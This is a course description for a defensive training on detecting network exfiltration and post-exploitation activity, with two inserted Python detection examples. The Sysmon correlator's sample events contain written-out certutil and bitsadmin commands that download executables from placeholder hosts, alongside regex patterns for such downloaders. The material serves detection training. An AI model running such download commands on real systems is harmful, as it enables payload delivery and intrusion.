Detection of In & Out – Network Exfiltration and Post-Exploitation Techniques – BLUE EDITION

Course Description


“Detection of In & Out – Network Exfiltration and Post-Exploitation Techniques – BLUE EDITION” is an advanced lab-based training created to present participants with:

  • The significance of security event correlation, including context, to reduce the number of false positives and improve detection of adversary activity
  • Advanced detection methods and techniques against exfiltration and lateral movement, including event mapping, grouping and tagging
  • Tactics and behaviours of the adversary after gaining initial access to the network (Linux/Windows)
  • Detection methods for tunnelling, hiding, pivoting and custom, simulated malicious network events
  • Capabilities of many popular Open Source tools and their integration with 3rd-party security (IDS/IPS/WAF/EDR) and analytics solutions against adversary actions
  • Verification methods and techniques for products and services from the IT Security space → internal testing and PoC / PoV programs

The main goal of the workshop is better detection of post-exploitation activities and more effective incident handling, thus reducing the number of false positives in the SOC environment. Individual detection lab cases will be launched and analyzed together in detail, by finding new DFIR artifacts and using existing ones. The modular, lab-oriented form of the training allows for later reuse and combination within your own SOC infrastructure, expanding and delivering complex tactics, techniques and procedures (TTPs).

Individual artifacts of “RED” actions will be linked, properly characterized, tagged and grouped taking into account the level of criticality, mapping to the MITRE ATT&CK Framework and chain-linking events/pieces of evidence that make up a given security incident.

The workshop is filled with practical examples and contextual material from the threat hunting and Blue / Red team community, with the original sources cited.

An integral element of the workshop is a DFIR quiz in which real cases of suspicious activity are presented as offline artifacts to be described.

The entire training is based on a purely practical laboratory in which the student independently performs each action or related scenario in a dedicated virtual laboratory network. This class focuses on x86 / x64 architecture and IPv4 / IPv6 networks, and targets distributed Linux and Windows environments (Active Directory on Windows Server 2016, Windows 10, Windows 7).

In terms of IDS / IPS / Data Leakage Protection, and for a better understanding of the current state of your network security posture, the training experience will help you understand the risks and identify blind spots in your network security and undiscovered infrastructure spaces by simulating and detecting the actions of a real cyber-threat actor.

The proposed BLUE training agenda – the defensive edition – is a natural continuation of the first, offensive (RED) edition of the training. Highly technical content and a strictly practical approach ensure that applying the transferred knowledge and technologies in real production environments will be easy, smooth and repeatable.

Make sure your network’s security really works!

Course contents

Day 1:

  • Introduction → PCAP Exfiltration CTF-style challenge.
  • One more time → MITRE ATT&CK Framework → detection map based on 5 examples of chained attack scenarios.
  • Finding malicious artifacts using yara and ssdeep:
    • How yara works and why it could be your best friend
    • Yarascan + Volatility Framework vs Linux rootkits
    • Yara vs webshells
  • Collecting, analyzing and correlating data from different data sources using:
    • Wazuh
    • Graylog
    • Open vSwitch
    • Auditd / go-audit
    • eBPF
    • osquery
    • Splunk / Elastic Stack / HELK
  • The power of MISP – Threat Intelligence Platform.
  • Windows Sysinternals Suite:
    • Sysmon:
      • Process execution events
      • Network connection events
      • Image load events
      • Named pipe events
      • WMI events
      • PsExec events
    • Process Explorer
    • Process Monitor
    • Autoruns
    • Evidence traces of file download and execution:
      • cmd.exe
      • HTA
      • JS
      • VBS
      • WSF
      • JSE
      • C#
      • certutil
      • PowerShell
      • bitsadmin
      • Shellcode injection techniques
      • WebDAV / SMB / NFS share mapping
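The Day 1 Sysmon material above is about chaining process-creation, network-connection and "file download and execution" traces into one finding. The following is an added example (not course material and not the trainer's code) that correlates constructed Sysmon-style records: an EventID 1 whose command line matches a download-capable LOLBin (certutil -urlcache, bitsadmin /transfer, PowerShell download cmdlets), the EventID 3 egress of that same ProcessGuid, and a later EventID 1 whose Image is the file the command line wrote to disk. The event values, the ProcessGuid strings and the 300-second window are assumptions; the finding is tagged with ATT&CK T1105 (Ingress Tool Transfer).

```python
import re
from datetime import datetime

# Command-line signatures of Windows LOLBins that can fetch a remote payload.
DOWNLOAD_PATTERNS = {
    "certutil":   re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I),
    "bitsadmin":  re.compile(r"bitsadmin(\.exe)?\b.*/transfer\b.*\bhttps?://", re.I),
    "powershell": re.compile(r"powershell(\.exe)?\b.*\b(DownloadFile|DownloadString|Invoke-WebRequest|iwr|wget|curl)\b", re.I),
}
# A local destination path with a directly executable extension.
LOCAL_PATH = re.compile(r"[A-Za-z]:\\\S+?\.(?:exe|dll|hta|js|vbs|wsf|jse|ps1|bat|cmd)\b", re.I)

# Constructed Sysmon-like records (hypothetical GUIDs, TEST-NET addresses).
EVENTS = [
    {"EventID": 1, "UtcTime": "2023-01-01 10:00:00.000", "ProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/update.exe C:\Users\Public\update.exe"},
    {"EventID": 3, "UtcTime": "2023-01-01 10:00:01.000", "ProcessGuid": "{A1}",
     "Image": r"C:\Windows\System32\certutil.exe", "DestinationIp": "203.0.113.5", "DestinationPort": 80},
    {"EventID": 1, "UtcTime": "2023-01-01 10:00:05.000", "ProcessGuid": "{A2}",
     "Image": r"C:\Users\Public\update.exe", "CommandLine": "update.exe"},
    {"EventID": 1, "UtcTime": "2023-01-01 10:01:00.000", "ProcessGuid": "{B1}",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job /download /priority high http://203.0.113.9/agent.dll C:\ProgramData\agent.dll"},
    {"EventID": 3, "UtcTime": "2023-01-01 10:01:01.000", "ProcessGuid": "{B1}",
     "Image": r"C:\Windows\System32\bitsadmin.exe", "DestinationIp": "203.0.113.9", "DestinationPort": 80},
    # Benign certutil use: no download switch, must not fire.
    {"EventID": 1, "UtcTime": "2023-01-01 10:02:00.000", "ProcessGuid": "{C1}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Users\Public\update.exe SHA256"},
]


def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def correlate_download_exec(events, window_s=300):
    """Chain EID 1 (download command) -> EID 3 (its egress) -> EID 1 (dropped file runs).

    One finding per download command; severity reflects how far the chain got."""
    events = sorted(events, key=_ts)
    findings = []
    for ev in events:
        if ev["EventID"] != 1:
            continue
        cmd = ev.get("CommandLine", "")
        tool = next((name for name, pat in DOWNLOAD_PATTERNS.items() if pat.search(cmd)), None)
        if tool is None:
            continue
        t0 = _ts(ev)
        # Stage 2: did the downloader process itself talk to the network?
        egress = [c for c in events
                  if c["EventID"] == 3 and c["ProcessGuid"] == ev["ProcessGuid"]]
        # Stage 3: was the file named on the command line executed shortly after?
        m = LOCAL_PATH.search(cmd)
        dropped = m.group(0).lower() if m else None
        executed = None
        if dropped:
            executed = next((x for x in events
                             if x["EventID"] == 1 and x.get("Image", "").lower() == dropped
                             and 0 <= (_ts(x) - t0).total_seconds() <= window_s), None)
        if executed:
            severity, stage = "high", "download-and-execute"
        elif egress:
            severity, stage = "medium", "download-confirmed"
        else:
            severity, stage = "low", "download-command-only"
        findings.append({
            "tool": tool,
            "severity": severity,
            "stage": stage,
            "attack": ["T1105"],  # Ingress Tool Transfer
            "downloader_guid": ev["ProcessGuid"],
            "destinations": sorted({f'{c["DestinationIp"]}:{c["DestinationPort"]}' for c in egress}),
            "dropped_file": dropped,
            "executed_guid": executed["ProcessGuid"] if executed else None,
        })
    return findings


if __name__ == "__main__":
    for finding in correlate_download_exec(EVENTS):
        print(finding)
```

The grading is the point: a certutil command line alone is a weak signal (plenty of admins hash files with it), the same process opening an outbound connection is stronger, and the written file starting as a new process within the window is what justifies a high-severity, single-incident ticket instead of three unrelated alerts.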

Day 2:

  • Low-level Linux security tracing and profiling for critical services:
    • eBPF
    • sysdig
  • Detection of unusual log patterns and 0-day exploitation attempts using source code analysis of your critical network service.
  • Playing with Bro (now Zeek) IDS / Suricata IDS for anomaly detection → finding malicious artifacts at the network level:
    • The importance of network baseline for high-risk environments
    • Virtual SPAN / TAP and NetFlow → Open vSwitch
    • Feature definition and extraction
    • Bro-cut syntax
    • Bro Script Index
    • Client/server Fingerprinting:
      • JA3
      • HASSH
    • Security feature extraction per many different network protocols
  • Detection and traces of network exfiltration techniques → use cases:
    • ICMP
    • TCP / UDP
    • SSL / TLS
    • DNS / DoH / DGA / anomalies
    • HTTP / HTTP2 / QUIC
    • LDAP Exfil
    • Dropbox / Twitter / Gmail / Mozilla
    • SMB bind named pipes
    • Legitimate website covert channel
    • Intelligent HTTP C2 Redirection
    • Port knocking
    • Domain fronting
    • ngrok
    • SSH Tunneling and pivoting
    • RDP Tunneling and pivoting / RDP Inception
    • Egress testing and common network traffic on non-standard ports
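The "DNS / DoH / DGA / anomalies" use case above comes down to profiling queries per registered domain against a baseline. The following is an added example (not course material and not the trainer's code) that takes records shaped like the `id.orig_h`, `query` and `qtype_name` columns of a Zeek dns.log and flags domains that receive many unique, long or high-entropy subdomain labels, which is how chunked data leaves over DNS. The traffic is constructed inline, the registered-domain split is a naive last-two-labels assumption (real use needs the Public Suffix List), and the thresholds are assumptions to tune against your own baseline.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character of the string; hex chunks sit near 4, words near 2-3."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Naive eTLD+1 (last two labels). Assumption: fine for the constructed data only."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def profile_dns(records, min_unique=20, min_len=30, min_entropy=3.5):
    """records: iterable of (client_ip, qname, qtype). Returns alerts per registered domain."""
    stats = defaultdict(lambda: {"subs": {}, "txt": 0, "total": 0, "clients": set()})
    for client, qname, qtype in records:
        dom = registered_domain(qname)
        s = stats[dom]
        s["total"] += 1
        s["clients"].add(client)
        if qtype in ("TXT", "NULL"):           # record types with room for payload
            s["txt"] += 1
        if qname.endswith("." + dom):
            sub = qname[: -len(dom) - 1]
            s["subs"][sub] = max(sub.split("."), key=len)   # longest label carries the chunk
    alerts = []
    for dom, s in stats.items():
        n = len(s["subs"])
        if n == 0:
            continue
        labels = s["subs"].values()
        avg_len = sum(len(l) for l in labels) / n
        avg_ent = sum(shannon_entropy(l) for l in labels) / n
        # Many distinct subdomains that are long or random-looking: chunked exfil or DGA-style C2.
        if n >= min_unique and (avg_len >= min_len or avg_ent >= min_entropy):
            alerts.append({
                "domain": dom,
                "unique_subdomains": n,
                "avg_label_len": round(avg_len, 1),
                "avg_entropy": round(avg_ent, 2),
                "txt_ratio": round(s["txt"] / s["total"], 2),
                "clients": sorted(s["clients"]),
                # T1048.003 Exfiltration Over Unencrypted Non-C2 Protocol, T1071.004 DNS
                "attack": ["T1048.003", "T1071.004"],
            })
    return alerts


def constructed_records():
    """Constructed sample: ordinary lookups from one host, chunked TXT exfil from another."""
    recs = []
    for i in range(50):
        recs.append(("10.0.0.5", ["www.example.org", "mail.example.org", "cdn.example.org"][i % 3], "A"))
    for i in range(32):
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]   # stands in for hex-encoded data
        recs.append(("10.0.0.23", f"{chunk}.t.exfil-example.net", "TXT"))
    return recs


if __name__ == "__main__":
    for alert in profile_dns(constructed_records()):
        print(alert)
```

Unique-subdomain count is what separates exfil from a busy CDN: a legitimate domain is queried thousands of times for a handful of names, whereas a DNS tunnel must use a new name for every chunk to defeat caching. Run the same profile over a clean week first so the thresholds reflect your own baseline.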

Day 3:

  • Detection and traces of post-exploitation, lateral movements → use cases:
    • AD Reconnaissance / AD Snapshot
    • Bloodhound artifacts
    • Golden Ticket
    • Silver Ticket
    • Kerberoasting
    • RPC over TCP/IP
    • DCsync / DCShadow
    • Mimikatz agent/server
    • Pass The Hash
    • smbexec
    • Invoke-WMI
    • Invoke-PsExec
    • PSRemoting
    • RDP wrapping
    • Offensive Powershell:
      • WMI multiple sessions
      • Remote network relaying
      • Copy VSS
      • Keylogging
      • LSA secrets extraction
      • Sandbox / virtual environment detection
      • UAC bypassing
    • Poisoning LLMNR, NBT-NS, mDNS, WPAD and WSUS
    • SMB ransomware detection.
    • Browser pivoting.
  • Detection of brute-force attacks → use cases:
    • SQL
    • AD
    • SSH
    • Web Apps
  • Windows Malware Persistence Methods:
    • Service
    • Winlogon registry entries
    • Run / RunOnce
    • Scheduled Tasks
    • Startup Folder
    • WMI
    • DLL
  • Linux Malware Persistence Methods:
    • Service
    • Startup scripts
    • SSH magic password
    • Port knocking / iptables
    • Kernel modules
  • Describing relevant log events as generic and open signature → Sigma rules:
    • Application
    • APT
    • Linux
    • Network
    • Proxy
    • Web
    • Windows

Prerequisites

  • An intermediate level of command line syntax experience using Linux and Windows
  • Fundamental knowledge of TCP/IP network protocols
  • Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required
  • Basic programming skills are a plus, but not essential

System Requirements

  • At least 30GB of free disk space
  • At least 8GB of RAM
  • Students should have the latest VirtualBox installed on their machine
  • Full Admin access on your laptop

Who should attend:

  • Red and Blue team members
  • Security / Data Analysts
  • CIRT / Incident Response Specialists
  • Network Security Engineers
  • SOC members and SIEM Engineers
  • AI / Machine Learning Developers
  • Chief Security Officers and IT Security Directors

If you are looking to:

  • Learn ways to improve your detection and event correlations skills across many different data sources
  • Find malicious activity and identify threat details on the network
  • Prepare your SOC team to quickly filter out network noise and handle incidents more effectively
  • Profile your critical OS and network segments in terms of ‘normal vs exotic’ behaviour
  • Find out how DFIR / IR Open Source Software can support your SIEM infrastructure
  • Learn current trends, techniques, and tools for network exfiltration and lateral movements
  • Understand the value of DLP / IDS / IPS / FW / WAF / Memory Forensics against real adversary lab scenarios
  • Understand the value of an automated approach to simulating attackers and generating anomalies
  • Identify blind spots in your network security posture

Then this training is for you!

Trainer Biography

Leszek Miś is the Founder of Defensive Security, Principal Trainer and Security Researcher with over 15 years of experience in the Cyber Security and Open Source Security Solutions market. He has gone through the full path of infosec career positions: from OSS researcher, Linux administrator and system developer, Solution Engineer, DevOps and CI, through penetration tester and security consultant delivering hardening services and training for the biggest players in the European market, to finally become an IT Security Architect / SOC Security Analyst with a deep, vendor-neutral focus on network security attack and detection. He has deep knowledge of finding blind spots and security gaps in corporate environments, and understands the technology and business value of delivering a structured, automated adversary simulation platform.

Recognized speaker and trainer: BruCON, Black Hat USA, OWASP Appsec USA, FloCon USA, Hack In The Box DBX/AMS/Singapore, Nanosec Asia, Confidence PL, PLNOG, Open Source Day PL, Red Hat Roadshow. Member of OWASP Poland Chapter.

Author of many IT Security trainings:

  • Open Source Defensive Security → The Trinity of Tactics for Defenders
  • In & Out → Network Data Exfiltration Techniques [RED EDITION]
  • In & Out → Detection of Network Data Exfiltration Techniques [BLUE EDITION]
  • System Internals – Network, OS and Memory Forensics
  • SELinux → Development & Administration of Mandatory Access Control Policy
  • Advanced RHEL/CentOS Defensive Security & Hardening
  • ModSecurity → Development and Management of Web Application Firewall rules
  • FreeIPA → Identity Management for Linux Domain Environments & Trusts

Holds many certifications: OSCP, RHCA, RHCSS, Splunk Certified Architect.

His areas of interest include network “feature” extraction, OS internals and forensics. He constantly tries to figure out what the AI/ML network security vendors are actually selling. In his free time he likes to break into the “IoT world” just for fun.

Still learning hard every single day.